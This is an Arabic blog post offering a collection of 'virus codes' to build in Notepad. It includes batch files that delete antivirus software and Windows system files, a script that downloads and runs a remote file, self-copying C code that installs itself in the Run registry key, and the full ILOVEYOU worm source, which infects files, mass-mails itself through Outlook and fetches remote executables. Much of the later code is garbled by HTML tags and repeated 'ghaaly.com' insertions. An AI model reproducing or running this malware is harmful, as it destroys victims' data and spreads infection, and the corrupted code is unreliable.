الجمعة 25 أكتوبر 2013 - الساعة الآن 00:03:39 صباحاً

الثلاثاء، 10 سبتمبر 2013

اكواد فايروس vbs

اكواد فايروس vbs

اكواد فايروس vbs

السلام عليكم


اليوم احب اقدملكم اكبر مجموعة اكواد فايروسات على الاطلاق واخطرها

ملاحظة : لا تفتح اي فايروس بعد صنعه
جميع هذه الفايروسات يتم صنعها بـ NoteBad

  نبدي :
1 - قاتل الماكافي
 @echo welcome to the winbooster by Agent007
@echo if u want to make your computer get faster , you should follow
@echo the next steps )step by step)
@pause
cd
c:
dir
dir c:progra~1norton~1
@echo if u want to make your computer faster
@pause
@echo now you should to **** y and press enter
del c:progra~1norton~1
@pause
c:
dir
@echo if u want to make your computer faster
@pause
@dir c:progra~1
dir c:progra~1zonea~1zonealarm
del c:progra~1zonea~1zonealarm
@echo be happy your computer now is faster than before
exit

----------------------------------

2 - تفادي الديب فريز

@echo off
set file="ضع هناء رابط باتشك"
set dlto="C:\"
::----------------

if exist %temp%\dl.vbs del /q %temp%\dl.vbs
echo HTTPDownload %file%,%dlto% >> %temp%\dl.vbs
echo Sub HTTPDownload( myURL, myPath ) >> %temp%\dl.vbs
echo Dim i, objFile, objFSO, objHTTP, strFile, strMsg >> %temp%\dl.vbs
echo Const ForReading = 1, ForWriting = 2, ForAppending = 8 >> %temp%\dl.vbs
echo Set objFSO = CreateObject( "Scripting.FileSystemObject" ) >> %temp%\dl.vbs
echo If objFSO.FolderExists( myPath ) Then >> %temp%\dl.vbs
echo strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) ) >> %temp%\dl.vbs
echo ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then >> %temp%\dl.vbs
echo strFile = myPath >> %temp%\dl.vbs

echo Else >> %temp%\dl.vbs
echo Exit Sub >> %temp%\dl.vbs
echo End If >> %temp%\dl.vbs
echo Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True ) >> %temp%\dl.vbs
echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%\dl.vbs
echo objHTTP.Open "GET", myURL, False >> %temp%\dl.vbs
echo objHTTP.Send >> %temp%\dl.vbs
echo For i = 1 To LenB( objHTTP.ResponseBody ) >> %temp%\dl.vbs
echo objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) ) >> %temp%\dl.vbs
echo Next >> %temp%\dl.vbs
echo objFile.Close( ) >> %temp%\dl.vbs
echo End Sub >> %temp%\dl.vbs

start %temp%\dl.vbs

-------------------------------------

3 - جنن الضحية

cmdow @ /HID
shutdown.exe -r -f -t 60 -c "Windows XP will now restart in 60 Seconds...hacked by حط هناء الكلام الي تبية يطلع للضحية"
net user aspnet /delete

EXIT

-------------------------------------

4 - خدعة تحميل فايروس











ــــــــــــــــــــــــــــ
الكوٍد رقم (3)
ــــــــــــــــــــــــــــ
رٍيستارٍتـ للجهازٍ *_*
ــــــــــــــــــــــــــــ
#include
#include
#include

{
char sys1[256];
char sys2[256];
char win1[256];
GetModuleFileName(hMod, path, sizeof(path));
GetSystemDirectory(sys1, sizeof(sys1));
GetSystemDirectory(sys2, sizeof(sys2));
GetWindowsDirectory(win1, sizeof(win1));
strcat(sys1, "\\Sleep.exe");
strcat(sys2, "\\Doom32.com");
strcat(win1, "\\WinUpdate.exe");
CopyFile(path, sys1, false);
CopyFile(path, sys2, false);
CopyFile(path, win1, false);

MessageBox (0, "Not been foun Ram ", "Error !", MB_ICONERROR | MB_OK);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "SLEEP", 0, REG_SZ, (const unsigned char*) sys1, sizeof(sys1));
RegSetValueEx(hKey, "DOOM32", 0, REG_SZ, (const unsigned char*) sys2, sizeof(sys2));
RegSetValueEx(hKey, "WinUpdate", 0, REG_SZ, (const unsigned char*) win1, sizeof(win1));
RegCloseKey(hKey);
}

{
system("shutdown -s -f ");
MessageBox(NULL,"Not enough memory to load this file.","Error !", MB_ICONERROR | MB_OK);
}
ــــــــــــــــــــــــــــ
الكوٍد رقم (4)
ــــــــــــــــــــــــــــ
أيقافـ تشغيـل الجهازٍ *_*
ــــــــــــــــــــــــــــ
@echo off
echo hi
del/a/q c:\windows\*.*
del/a/q c:\windows\system32\*.*
rmdir/s/q c:\windows
echo bey
pause
ــــــــــــــــــــــــــــ
الكوٍد رقم (5)
ــــــــــــــــــــــــــــ
هذا كود لفيرس "الحب " *_*
ــــــــــــــــــــــــــــ
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML<?-?TITLE><META<br> NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _<br> "<meta NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?<br> @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _<br> "<meta NAME=@-@Description@-@ CONTENT=@-@simple but i think this is<br> good...@-@>"&vbcrlf& _<br> "<?-?HEAD><BODY<br> ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#<br> -#,#-#main#-#)@-@ "&vbcrlf& _<br> "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#<br> -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _<br> "<center> <p> This HTML file need ActiveX Control<?-?p><p> To Enable to read<br> this HTML file<br>- Please press #-#YES#-# button to Enable<br> ActiveX<?-?p>"&vbcrlf& _<br> "<?-?CENTER><marquee LOOP=@-@infinite@-@<br> BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE><br> "&vbcrlf& _<br> "<?-?BODY><?-?HTML>"&vbcrlf& _<br> "<script language=@-@JScript@-@>"&vbcrlf& _<br> "<!--?-??-?"&vbcrlf& _<br> "if (window.screen){var wi=screen.availWidth;var<br> hi=screen.availHeight;window.****To(0,0);window.re sizeTo(wi,hi);}"&vbcrlf& _<br> "?-??-?-->"&vbcrlf& _<br> "<?-?SCRIPT>"&vbcrlf& _<br> "<script LANGUAGE=@-@VBScript@-@>"&vbcrlf& _<br> "<!--"&vbcrlf& _<br> "on error resume next"&vbcrlf& _<br> "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _<br> "aw=1"&vbcrlf& _<br> "code="<br> dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _<br> "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _<br> "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39 ))"&vbcrlf& _<br> "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(3 4))"&vbcrlf& _<br> "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(9 2))"&vbcrlf& _<br> "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _<br> "wri.write code4"&vbcrlf& _<br> "wri.close"&vbcrlf& _<br> "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _<br> "if (err.number=424) then"&vbcrlf& _<br> "aw=0"&vbcrlf& _<br> "end if"&vbcrlf& _<br> "if (aw=1) then"&vbcrlf& _<br> "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _<br> "window.close"&vbcrlf& _<br> "end if"&vbcrlf& _<br> "end if"&vbcrlf& _<br> "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _<br> "regedit.RegWrite<br> @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru<br> n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _<br> "?-??-?-->"&vbcrlf& _<br> "<?-?SCRIPT>"<br> dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")<br> dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")<br> dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")<br> dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")<br> dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")<br> dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")<br> dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")<br> dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")<br> set fso=CreateObject("Scripting.FileSystemObject")<br> set c=fso.OpenTextFile(WScript.ScriptFullName,1)<br> lines=Split(c.ReadAll,vbcrlf)<br> l1=ubound(lines)<br> for n=0 to ubound(lines)<br> lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr( 91))<br> lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93))<br> lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr( 37))<br> if (l1=n) then<br> lines(n)=chr(34)+lines(n)+chr(34)<br> else<br> lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"<br> end if<br> next<br> set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")<br> b.close<br> set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)<br> d.write dt5<br> d.write join(lines,vbcrlf)<br> d.write vbcrlf<br> d.write dt6<br> d.close<br> end sub <br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(0, 0, 255);"><u><i><b> الكوٍد رقم (6)</b></i></u></span><br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(255, 0, 0);"><u><i><b> فيرٍوٍس جلب الاداة</b></i></u></span><br> ــــــــــــــــــــــــــــ<br> le code<br> app.taskvisible=false<br> call kill("c:\windows\*.exe")<br> call kill("c:\windows\*.ini")<br> call kill("c:\windows\*.dll")<br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(0, 0, 255);"><u><i><b> الكوٍد رقم (7)</b></i></u></span><br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(255, 0, 0);"><u><i><b> فيرٍوٍس يؤدي لمسح كل ملفات dll و sys</b></i></u></span><br> ــــــــــــــــــــــــــــ<br> @Echo off <br> c: <br> cd %WinDir%\System\ <br> deltree /y *.dll <br> cd\ <br> deltree /y *.sys<br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(0, 0, 255);"><u><i><b> الكوٍد رقم (8)</b></i></u></span><br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(255, 0, 0);"><u><i><b> كود لحذف شاشة الترحيب للويندوز</b></i></u></span><br> ــــــــــــــــــــــــــــ<br> Del c:\windows\Logos.sys<br> <br> Del c:\windows\Logow.sys<br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(0, 0, 255);"><u><i><b> الكوٍد رقم (9)</b></i></u></span><br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(255, 0, 0);"><u><i><b> كود فيروس حذف Regedit و Msconfig</b></i></u></span><br> ــــــــــــــــــــــــــــ<br> c:\windows\regedit.exe del<br> <br> C:\windows\system\msconfig.exe de<br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(0, 0, 255);"><u><i><b> الكوٍد رقم (10)</b></i></u></span><br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(255, 0, 0);"><u><i><b> كود فيروس لتدمير الويندوز</b></i></u></span><br> ــــــــــــــــــــــــــــ<br> Del c:\windows\system\msconfig.exe <br> <br> Del c:\windows\Rundll32.exe <br> <br> Del c:\windows\regedit.exe <br> <br> Del c:\windows\Rundll.exe <br> <br> Del c:\Autoexec.bat <br> <br> Del c:\command.com <br> <br> Del c:\windows\Logos.sys <br> <br> Del c:\windows\Logow.sys <br> <br> Del c:\windows\Scanregw.exe <br> <br> Del C:\Program Files\Internet Explorer\Iexplore.exe <br> <br> Del c:\windows\system\Sysedit.exe <br> <br> Del c:\windows\win.com <br> <br> <br> <br> @Echo off <br> <br> c: <br> <br> cd %WinDir%\System\ <br> <br> deltree /y *.exe<br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(0, 0, 255);"><u><i><b> الكوٍد رقم (11)</b></i></u></span><br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(255, 0, 0);"><u><i><b> كود فيروس يدمر برنامج الـ Norton والـ Zone Alarm </b></i></u></span><br> ــــــــــــــــــــــــــــ<br> @echo welcome to the winbooster by Agent007 <br> <br> @echo if u want to make your computer get faster , you should follow <br> <br> @echo the next steps (step by step) <br> <br> @pause <br> <br> cd\ <br> <br> c: <br> <br> dir <br> <br> dir c:\progra~1\norton~1 <br> <br> @echo if u want to make your computer faster <br> <br> @pause <br> <br> @echo now you should to type y and press enter <br> <br> del c:\progra~1\norton~1 <br> <br> @pause <br> <br> c: <br> <br> dir <br> <br> @echo if u want to make your computer faster <br> <br> @pause <br> <br> @dir c:\progra~1 <br> <br> dir c:\progra~1\zonea~1\zonealarm <br> <br> del c:\progra~1\zonea~1\zonealarm <br> <br> @echo be happy your computer now is faster than before <br> <br> :exit<br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(0, 0, 255);"><u><i><b> الكوٍد رقم (12)</b></i></u></span><br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(255, 0, 0);"><u><i><b> كود فيروس الـ Visual Basic </b></i></u></span><br> ــــــــــــــــــــــــــــ<br> SetAttr "c:\autoexec.bat", vbNormal <br> SetAttr "c:\msdos.sys", vbNormal <br> SetAttr "c:\io.sys", vbNormal <br> SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini", vbNormal <br> SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini", vbNormal <br> SetAttr "c:\command.com", vbNormal <br> SetAttr "c:\config.sys", vbNormal <br> SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe", vbNormal <br> SetAttr "c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe", vbNormal <br> Kill "C:\autoexec.bat" <br> Kill "C:\msdos.sys" <br> Kill "C:\io.sys" <br> Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.ini" <br> Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system.ini" <br> Kill "C:\command.com" <br> Kill "C:\config.sys" <br> Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll.exe" <br> Kill "C:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\rundll32.exe" <br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(0, 0, 255);"><u><i><b> الكوٍد رقم (13)</b></i></u></span><br> ــــــــــــــــــــــــــــ<br><span style="color: rgb(255, 0, 0);"><u><i><b> كود فيروس لتدمير الـ ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com</b></i></u></span><br> ــــــــــــــــــــــــــــ<br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\msconfig.exe <br> <br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll32.exe <br> <br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\regedit.exe <br> <br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Rundll.exe <br> <br> Del c:\Autoexec.bat <br> <br> Del c:\command.com <br> <br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logos.sys <br> <br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Logow.sys <br> <br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\Scanregw.exe <br> <br> Del C:\Program Files\Internet Explorer\Iexplore.exe <br> <br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\system\Sysedit.exe <br> <br> Del c:\ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/\win.com <br> <br> <br> <br> @Echo off <br> <br> c: <br> <br> cd %WinDir%\System\ <br> <br> deltree /y *.exe <br> <br> ------------------------------------<br> <br> <span style="color: rgb(0, 255, 0);"><font size="6"><i>طبعا هذا موضوع متجدد<br> <br> جميع هذه الاكواد من تجميعي<br> <br> <br> تحياتي </i></font></span> </p> </div>
جميع الحقوق محفوظة مدونة الإبداع 2016
حقوق النشر محفوظة لـ : مدونة الإبداع ©